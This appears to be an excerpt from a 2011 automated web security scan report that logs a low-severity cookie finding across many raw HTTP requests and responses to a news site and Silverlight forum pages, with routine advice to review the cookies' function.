<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/ HTTP/1.1 Host: entertainment.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 62350 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=995146dbfad74c20970e903f13e0f1ce; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:46:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Just In Ne ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/ HTTP/1.1 Host: entertainment.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 26701 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=67f07d4e22dd45d1976d2b39e3c3771d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:46:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/cc136530.aspx HTTP/1.1 Host: expression.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAD4BwAAfetuS+xFfAxTn86aknonWg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:41:15 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:41:15 GMT Content-Length: 66884
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><link i ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: forums.silverlight.net Proxy-Connection: keep-alive Referer: http://www.silverlight.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 62169 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:48 GMT; expires=Sun, 29-Jan-2012 23:20:48 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:48 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:20:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/13.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 72202 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/14.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73488 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:22 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/15.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 76271 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:23 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/16.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 72987 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/17.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 76509 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/18.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73765 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:34 GMT; expires=Sun, 29-Jan-2012 23:17:34 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:35 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/19.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73133 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:15 GMT; expires=Sun, 29-Jan-2012 23:18:15 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:15 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/20.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 71471 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:22 GMT; expires=Sun, 29-Jan-2012 23:18:22 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:23 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/21.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 64982 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:47 GMT; expires=Sun, 29-Jan-2012 23:18:47 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/25.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 66083 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:48 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/28.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 76750 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:40 GMT; expires=Sun, 29-Jan-2012 23:17:40 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:40 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/35.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 76441 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:33 GMT; expires=Sun, 29-Jan-2012 23:17:33 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:34 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/46.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 72228 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:51 GMT; expires=Sun, 29-Jan-2012 23:17:51 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:51 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
